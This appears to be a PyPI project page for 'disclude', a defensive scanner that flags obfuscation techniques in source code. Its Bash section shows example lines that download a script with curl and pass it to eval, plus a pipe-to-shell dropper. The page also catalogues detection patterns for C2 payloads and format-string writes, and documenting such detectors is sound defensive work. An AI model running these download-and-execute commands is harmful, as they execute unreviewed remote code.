Skip to main content

Detect obfuscation in source code packages.

Project description

disclude

Scan a (C, Rust, Python, TypeScript, Bash/Shell) source tree for signs that code is hiding its intent from a human reader: Unicode attacks, encoded payloads, dynamic execution patterns, and build-time escape hatches. This is not a general purpose vulnerability scanner. This is a tool to surface the techniques used to make malicious code look benign on review.

Implemented in fast, multi-threaded Rust. Useful for humans, useful for AI agents: find areas for examination faster (and cheaper) than full code scans.

Install

pip install disclude

Usage

disclude scan <path> [options]
Flag Default Description
--format human Output format: human, json, sarif
--severity warn Minimum severity to report: info, warn, critical
--exit-code off Exit 1 if any findings at or above threshold
--diff <ref> Annotate findings introduced since a git ref (main, a tag, a SHA)
--lang <lang> auto Override language detection: python, rust, ts, js, c, bash/sh/shell
--ignore <file> Additional ignore file (gitignore syntax)
--no-raw Skip raw byte analysis
--no-token Skip token-level analysis
--no-ast Skip AST analysis (faster, less precise)

Examples

# Human-readable report, warn and above
disclude scan ./my-package

# SARIF output for GitHub Code Scanning
disclude scan ./my-package --format sarif > results.sarif

# CI gate: fail if any critical finding
disclude scan ./my-package --severity critical --exit-code

# Review only what a PR introduced
disclude scan ./my-package --diff main --exit-code

Output formats

human: coloured terminal output grouped by file.

json: newline-delimited JSON, one object per file. Suitable for further processing.

sarif: SARIF 2.1.0, compatible with GitHub Code Scanning, VS Code SARIF viewer, and most CI platforms. Every signal kind appears in the rules catalog even if no findings were produced.

Languages

Language is detected from file extension or shebang line.

Language Extensions Shebang
Bash/Shell .sh, .bash, .bsh, .ksh, .zsh bash, sh, ksh, zsh
C .c, .h
Python .py, .pyi python
Rust .rs
TypeScript .ts, .tsx, .mts, .cts
JavaScript .js, .jsx, .mjs, .cjs node, deno, bun

How it works

Each file passes through up to three analysis layers. Later layers refine earlier ones. For example, a base64 blob found in a comment is demoted to info by the token pass because encoded text in comments is common and low-risk.

Raw pass   → byte-level: Unicode codepoints, encoded strings, entropy, line length
Token pass → language-aware: reclassify raw findings by context (identifier / string / comment),
             emit identifier anomalies and string-concat patterns
AST pass   → tree-sitter: function call patterns, build scripts, install hooks

Severity levels: critical (high confidence attack signal), warn (suspicious, review recommended), info (low confidence or expected in some legitimate code).

Checks

Unicode obfuscation

These run on every file regardless of language.

Signal Severity Description
unicode-bidi critical Bidirectional control characters (U+202A–U+202E, U+2066–U+2069). The Trojan Source attack class — bidi overrides make code appear to do something different from what it compiles to.
unicode-zero-width warn Zero-width characters (U+200B ZWSP, U+200C ZWNJ, U+200D ZWJ, U+00AD soft hyphen, U+FEFF BOM outside file start). Can silently change identifier names or inject hidden content.
unicode-invisible warn Characters from the Unicode Tags block (U+E0001 LANGUAGE TAG; U+E0020–U+E007F). These are invisible in all common renderers and have no legitimate use in source code. Used in IOCCC 2024 "salmon" to attach invisible suffixes to macro names, making identifiers silently different from what they appear. Demoted to info when found inside string literals or comments.
unicode-mixed-script warn Identifier contains characters from more than one Unicode script (e.g. Cyrillic + Latin). Demoted to info inside strings/comments.
unicode-homoglyph warn Identifier contains characters that are visually indistinguishable from a different ASCII character (e.g. Cyrillic а vs Latin a). Demoted to info inside strings/comments.

Surrogate escape sequences

Applies to JavaScript and TypeScript string literals only.

Signal Severity Description
unicode-surrogate warn / info \uHHHH escape sequences forming UTF-16 surrogate pairs. JavaScript runtimes recombine adjacent surrogate pairs at runtime — a pair such as 󠁁 evaluates to U+E0041 (TAG LATIN CAPITAL LETTER A), an invisible tag character. Warn when the decoded codepoint is a Tags block character; info for other surrogate pairs (e.g. emoji written as 😀) or orphaned surrogates.

Encoded payloads

These run on every file regardless of language.

Signal Severity Description
encoding-base64 warn Base64-shaped blob in a string literal. Threshold: ≥64 chars for unpadded blobs; ≥40 chars when the blob ends with = or == padding (padding is definitive proof of base64 encoding, ruling out hex digests and identifiers). Often used to embed payloads or C2 URLs that are decoded and requested at runtime. Demoted to info outside string literals.
encoding-hex warn Long run of \xNN hex escape sequences in a string literal. A common way to embed shellcode or obfuscated text. Demoted to info outside string literals.
encoding-octal warn Long run of \NNN octal escape sequences (≥6 consecutive, minimum entropy 2.5 bits/byte). Octal is less recognizable than hex and valid in C, Python, and JavaScript — used to encode arbitrary bytes or hide printable characters (\101 for A, \012 for newline). Demoted to info outside string literals.
encoding-escape-soup warn Dense mix of arbitrary escape sequences. Indicates content that has been serialized or obfuscated to avoid plain-text grep.

Code structure anomalies

These run on every file regardless of language.

Signal Severity Description
high-complexity warn String literal with unusually high Shannon entropy (high compression ratio). Raw high-entropy data in source is often an encoded payload or embedded binary.
long-line info Line length exceeds threshold in a file that is not a minified bundle. Lines dominated (>80%) by string/comment content are suppressed — the signal targets long code lines, which are a common obfuscation tactic.
whitespace-anomaly warn Unusual whitespace in indentation (e.g. mixed tabs/spaces, non-standard whitespace characters), or — for C — decorative internal whitespace layout where ≥ 30 % of lines have ≥ 2 runs of ≥ 4 spaces between code tokens. The decorative trigger catches IOCCC-style code that has been padded into rectangles, diamonds, or other visual shapes. Two structural-alignment filters suppress switch/case tables (one starting keyword dominates) and column-aligned data arrays (run-start columns cluster at a few fixed positions).
narrow-file-charset warn The file's entire printable non-whitespace character vocabulary fits within ≤ 12 distinct ASCII characters (minimum 200 bytes of content). JSFuck uses exactly 6 characters (!()+[]) to encode arbitrary JavaScript using type coercion — the resulting file has no readable identifiers, strings, or keywords. The message names the characters found.

Identifier anomalies

Token pass; language-aware.

Signal Severity Description
identifier-narrow-charset warn Identifier composed entirely of visually confusable characters (l, I, 1, O, 0). Names like lI1O0lI are unreadable by design.
identifier-low-length info File-wide naming-shape signal. Fires when the mean non-conventional identifier length is below 2.0 over at least 20 identifiers, or when ≥ 40 % of non-conventional identifiers are exactly one character (over at least 30 identifiers). The second trigger catches IOCCC-style obfuscation where a sprinkling of long keywords (extern, nanosleep, TIOCGWINSZ) inflates the mean above 2.0 even though most globals and functions are single letters.
string-concat-construction warn String concatenation that reconstructs a sensitive identifier (exec, eval, import, getattr, system, require, etc.). A common pattern to dodge static keyword grep.

Dynamic execution — Python

AST pass; tree-sitter.

Signal Severity Description
dynamic-execution critical / warn exec() or eval() called with a non-literal argument (critical), or with a literal (warn). Also fires when compile() is reached by a decoded value.
dynamic-import warn __import__() or importlib.import_module() called with a non-literal specifier.
dynamic-attribute warn getattr(obj, name) where name is not a string literal — runtime-resolved attribute lookup.

Dynamic execution — TypeScript / JavaScript

AST pass; tree-sitter.

Signal Severity Description
dynamic-execution critical / warn / info eval(), new Function(), or setTimeout/setInterval called with a string argument (critical/warn). atob(x) — base64 decode at runtime (warn); the first step of the classic supply-chain pattern: store C2 URL or payload as a base64 literal, decode it, then fetch or exec. btoa(x) — base64 encode at runtime (info); used in exfiltration patterns.
dynamic-import warn require(expr) where expr is not a string literal, or import(`...${expr}...`) template.
dynamic-attribute warn process.binding(name) — Node.js internal binding escape hatch, reaches C++ internals not exposed through the public API.

Dynamic execution — Bash/Shell

AST pass; tree-sitter.

Signal Severity Description
dynamic-execution critical / warn eval called with a dynamic argument — variable expansion (eval "$VAR"), command substitution (eval $(cmd)), or a word containing variable references (critical). eval called with a plain string literal (warn). Also fires when exec is called with a variable as the binary path (exec $cmd), since the executed binary is unknown statically (critical).
dynamic-import warn source $path or . $path where the path contains a variable — the sourced file is determined at runtime.
dynamic-execution (pipeline) warn A pipeline ending with bash, sh, ksh, or zsh — the classic "pipe to shell" dropper pattern (curl … | bash). Downloads and immediately executes arbitrary code without inspection.

Examples:

# CRITICAL — dynamic value reaches eval
PAYLOAD=$(curl -s https://example.com/update.sh)
eval "$PAYLOAD"

# CRITICAL — exec with variable binary path
exec $USER_SUPPLIED_BIN

# WARN — source with variable path
source $CONFIG_DIR/init.sh

# WARN — classic pipe-to-shell dropper
curl -fsSL https://example.com/install.sh | bash

Dynamic execution — C

AST pass; tree-sitter.

Signal Severity Description
dynamic-execution critical / warn system(cmd) or exec*(path, ...) (execl, execlp, execle, execv, execvp, execve) or popen(cmd, mode). Critical when the argument is a variable; warn when it is a string literal.
dynamic-import warn dlopen(path, flags) with a non-literal path — dynamically loads a shared library.
dynamic-attribute warn dlsym(handle, name) with a non-literal symbol name — resolves a function pointer by name at runtime.

C-specific obfuscation

Signal Severity Description
macro-alias warn Token pass. #define <name> <replacement> where the macro name is 1–2 characters and the replacement is a sensitive identifier (write, read, open, system, exec*, popen, fork, kill, ptrace, syscall, dlopen, dlsym, mmap, mprotect, socket, connect, send, recv, …). A common dropper trick: the syscall is renamed to a single letter so that simple keyword grep over the source misses it. Function-like macros and multi-token bodies are excluded.
macro-keyword-override warn Token pass. #define <keyword> <body> where <keyword> is a reserved pre-C11 keyword (int, char, double, union, for, return, …) and the replacement body is non-empty. Rebinding a keyword silently changes what every later occurrence in the file means — an IOCCC favourite (#define double(a,b) int, #define union static struct). C11+ pseudo-keywords (_Static_assert, _Generic, _Atomic, _Alignas, _Alignof, _Thread_local, _Noreturn) are excluded because real codebases routinely polyfill them. Empty-body shims (#define inline) are excluded.
identifier-confusable-collision warn Token pass. Two distinct identifiers in the same file collapse to the same visual skeleton after grouping confusable characters — round-O 0/O/o and vertical-stroke 1/l/I (lowercase i is excluded; its dot makes it visually distinct). Fires only when at least one position differs as digit-vs-letter (_0 vs _O, x0 vs xO); pure case-pair collisions like Object/object are excluded as a common C convention rather than the IOCCC digit-letter swap.
numeric-literal-payload critical AST pass. A wide-numeric array (≥ 8 elements of short, int, long, long long, float, double, long double, wchar_t, size_t, int16_t/int32_t/int64_t, uint16_t/uint32_t/uint64_t, intptr_t, uintptr_t, …) that is later reinterpreted through a byte-pointer cast (char *, unsigned char *, signed char *, int8_t *, uint8_t *). Hides arbitrary bytes inside what looks like a table of floating-point or integer constants. Findings are deduped per array — one report per array citing the cast count.
format-string-write critical Token pass. printf-family format string contains a %n write directive (%n, %hhn, %hn, %ln, %lln, with optional positional %<digit>$…n). The n conversion writes the byte-count-so-far into an int * argument — a memory write primitive seen almost exclusively in CTF/exploit code and IOCCC entries. Detected inside string literals and inside #define macro bodies (catches the IOCCC stringification trick #define N(a) "%"#a"$hhn", where the $hhn directive tail is split across stringification). Comments mentioning %n are excluded — both standalone and embedded /* ... */ / // ... inside #define lines.
legacy-k-and-r-main warn AST pass. main() defined without an explicit return type — pre-ANSI K&R style (main() { ... } or main(argc, argv) int argc; char **argv; { ... }). Modern C requires int main(...); the implicit-int form is undefined behaviour in C99+ and is a strong indicator of intentionally archaic source (IOCCC entries) or pre-1989 code.
implicit-int-function warn AST pass. Three or more functions in the same file are defined without an explicit return type (pre-ANSI K&R implicit-int). Catches IOCCC sources where every function is shaped Q(a){return a;}. The single-function main() form is reported by legacy-k-and-r-main; this signal is the file-wide pattern.
dynamic-format-string warn AST pass. A printf-family call (printf, fprintf, dprintf, sprintf, snprintf, asprintf, and the w-wide variants) uses a non-literal format string — the classic format-string-bug shape. The v* variadic forwarders are excluded by design. Bare-identifier format args that resolve to a parameter or local variable of the enclosing function are excluded (legitimate format selection). SCREAMING_SNAKE_CASE names are treated as macro-defined formats and excluded, as are i18n wrappers (_(...), gettext(...), dgettext, ngettext, …).
embedded-nul-in-string warn Token pass. A C string literal contains an embedded NUL escape (\0, \00, \000, \x00) followed by additional non-whitespace bytes. libc string functions truncate at the NUL while the trailing bytes remain accessible through memcpy/length-bearing APIs — a stealth payload pattern, and an IOCCC technique for stuffing extra data into a string that still looks short.
reverse-subscript-notation warn AST pass. Two shapes of the C a[b] ≡ b[a] trick: (1) a subscript_expression whose left operand is a numeric literal (2[arr] instead of arr[2]) — caught directly when the surrounding parse is clean; (2) a #define <name> [<expr>] macro whose body is a bare bracketed fragment, used to splice a reverse subscript at every call site (#define q [v+a]2 q2[v+a]). Real code essentially never indexes a pointer with the integer on the left. Subscripts inside ERROR parser-recovery contexts are excluded.
recursive-main-call warn AST pass. main is called from inside another function in the same TU — recursion through main is an IOCCC pattern (loop using argc/argv to thread state). The runtime is the only legitimate caller of main. The K&R main() { ... } definition shape (where tree-sitter wraps the bare signature in an ERROR containing a call_expression) is excluded so the implicit-int main definition isn't misread as a self-call.
stringify-dereference warn AST pass. A function-like macro body contains *#param — the # operator stringifies the macro argument into a string literal, and the leading * dereferences it to extract the first byte. A one-character literal extraction trick used in IOCCC code (e.g. *c == *#v to compare a runtime char against the first letter of a macro-arg token). Token paste ## is excluded.

Build-time and install-time

AST pass; language-specific.

Signal Severity Description
build-script-shellout critical Rust build.rs spawns a shell command or makes a network request at compile time. Malicious build scripts are a known supply-chain vector — they run automatically during cargo build. Also elevated to critical when found alongside unsafe code in the same file.
proc-macro-presence info Rust crate defines a procedural macro (proc-macro = true). Proc-macros run arbitrary code at compile time with full access to the compiler. Informational — legitimate proc-macros are common, but they warrant extra scrutiny in untrusted dependencies.
install-hook-shellout warn package.json preinstall/postinstall/install script shells out to a non-trivial command. Runs automatically on npm install.

What is New

1.2.0

Updates to the public interface.

1.1.0

Updates to the public interface.

1.0.0

Initial release.

Project details


Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Source Distribution

disclude-1.2.0.tar.gz (25.5 kB view details)

Uploaded Source

Built Distributions

If you're not sure about the file name format, learn more about wheel file names.

disclude-1.2.0-cp39-abi3-manylinux_2_17_x86_64.manylinux2014_x86_64.whl (2.5 MB view details)

Uploaded CPython 3.9+manylinux: glibc 2.17+ x86-64

disclude-1.2.0-cp39-abi3-manylinux_2_17_s390x.manylinux2014_s390x.whl (2.6 MB view details)

Uploaded CPython 3.9+manylinux: glibc 2.17+ s390x

disclude-1.2.0-cp39-abi3-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl (2.8 MB view details)

Uploaded CPython 3.9+manylinux: glibc 2.17+ ppc64le

disclude-1.2.0-cp39-abi3-manylinux_2_17_i686.manylinux2014_i686.whl (2.6 MB view details)

Uploaded CPython 3.9+manylinux: glibc 2.17+ i686

disclude-1.2.0-cp39-abi3-manylinux_2_17_armv7l.manylinux2014_armv7l.whl (2.4 MB view details)

Uploaded CPython 3.9+manylinux: glibc 2.17+ ARMv7l

disclude-1.2.0-cp39-abi3-macosx_11_0_arm64.whl (2.3 MB view details)

Uploaded CPython 3.9+macOS 11.0+ ARM64

disclude-1.2.0-cp39-abi3-macosx_10_12_x86_64.whl (2.3 MB view details)

Uploaded CPython 3.9+macOS 10.12+ x86-64

File details

Details for the file disclude-1.2.0.tar.gz.

File metadata

  • Download URL: disclude-1.2.0.tar.gz
  • Upload date:
  • Size: 25.5 kB
  • Tags: Source
  • Uploaded using Trusted Publishing? No
  • Uploaded via: maturin/1.13.1

File hashes

Hashes for disclude-1.2.0.tar.gz
Algorithm Hash digest
SHA256 708d7f960c82afa84ec383e65149009fc8e6efca320799e870d2ddc8eb973ae6
MD5 a9305435dae59c56cd245a478ffdd599
BLAKE2b-256 a858fef3e244c5bb5d2d5fde0b28ebdbc593ba71a3406909485fbff89d25e1bc

See more details on using hashes here.

File details

Details for the file disclude-1.2.0-cp39-abi3-manylinux_2_17_x86_64.manylinux2014_x86_64.whl.

File metadata

File hashes

Hashes for disclude-1.2.0-cp39-abi3-manylinux_2_17_x86_64.manylinux2014_x86_64.whl
Algorithm Hash digest
SHA256 17059a7b23ecf0f2d68a2b8df488ad1d1a5e0bb840d21a943c849d94740a4606
MD5 fb27f3721e492e0e86510d3929ca2807
BLAKE2b-256 32b1d90d67ef78a6e10bfdb7ebc49962e7894d16d19c13b2085f068956a86155

See more details on using hashes here.

File details

Details for the file disclude-1.2.0-cp39-abi3-manylinux_2_17_s390x.manylinux2014_s390x.whl.

File metadata

File hashes

Hashes for disclude-1.2.0-cp39-abi3-manylinux_2_17_s390x.manylinux2014_s390x.whl
Algorithm Hash digest
SHA256 5301ec428b1bab46baee8983af355da20ec867f2c304daed66549b325faf29d9
MD5 6f3db587820c9c55aeddcb63b998be56
BLAKE2b-256 2dfff5576d1915e2454bbd29534f2f925e1a755976e7e8e1c10c271894dcb52c

See more details on using hashes here.

File details

Details for the file disclude-1.2.0-cp39-abi3-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl.

File metadata

File hashes

Hashes for disclude-1.2.0-cp39-abi3-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl
Algorithm Hash digest
SHA256 c5935bc96692b401ad57faf3a5bef1e76f1986df87e3678c1f3a1dc8540782c6
MD5 e4424bcc8f0d300c2345de3b7cc49491
BLAKE2b-256 17834384a0d7e664d49cb65e891ff08398b3ac14e464fb22b1930e837d398d85

See more details on using hashes here.

File details

Details for the file disclude-1.2.0-cp39-abi3-manylinux_2_17_i686.manylinux2014_i686.whl.

File metadata

File hashes

Hashes for disclude-1.2.0-cp39-abi3-manylinux_2_17_i686.manylinux2014_i686.whl
Algorithm Hash digest
SHA256 e5859142011679a39d1786f39f74163b69141e52fb1aa8c73c2a62803082596d
MD5 fa7e5acd594b2bd17bcf5d59c5ff6378
BLAKE2b-256 a9348ed5cff5a2254b23c7d7c57137d64b289ee58d6f07e424f3f979b89d5aca

See more details on using hashes here.

File details

Details for the file disclude-1.2.0-cp39-abi3-manylinux_2_17_armv7l.manylinux2014_armv7l.whl.

File metadata

File hashes

Hashes for disclude-1.2.0-cp39-abi3-manylinux_2_17_armv7l.manylinux2014_armv7l.whl
Algorithm Hash digest
SHA256 26d4deeae950e72419722aec62bce4871a1b72095e09960988ec5dbcb68b4519
MD5 15dc9140e0ca9f668491934193c0008c
BLAKE2b-256 4c22ba8dae51c623ef93dc0a5a65bec19bdc067c9f9c908292b91c190ea2f0e4

See more details on using hashes here.

File details

Details for the file disclude-1.2.0-cp39-abi3-macosx_11_0_arm64.whl.

File metadata

File hashes

Hashes for disclude-1.2.0-cp39-abi3-macosx_11_0_arm64.whl
Algorithm Hash digest
SHA256 451540953746b63f2f202babbc75292970483959642959e57703d3e1553fed6e
MD5 8e1c76de24619dd7308bf44b60e28130
BLAKE2b-256 bd79d9f857ce2ebec9013546dead03cd6eb8ff707fc1a9a98b409c93e257f406

See more details on using hashes here.

File details

Details for the file disclude-1.2.0-cp39-abi3-macosx_10_12_x86_64.whl.

File metadata

File hashes

Hashes for disclude-1.2.0-cp39-abi3-macosx_10_12_x86_64.whl
Algorithm Hash digest
SHA256 3ba93d93219883252a1763b64d809a06bed6e2b95d92528761b1334f3cc0cc77
MD5 80ea7c8975a45f0b099b0ae6c77037c4
BLAKE2b-256 3b4c86021a8ae2b7d968b1cca2e9244be0ed0df2582482c4eb4aa27f92482511

See more details on using hashes here.

Supported by

AWS Cloud computing and Security Sponsor Datadog Monitoring Depot Continuous Integration Fastly CDN Google Download Analytics Pingdom Monitoring Sentry Error logging StatusPage Status page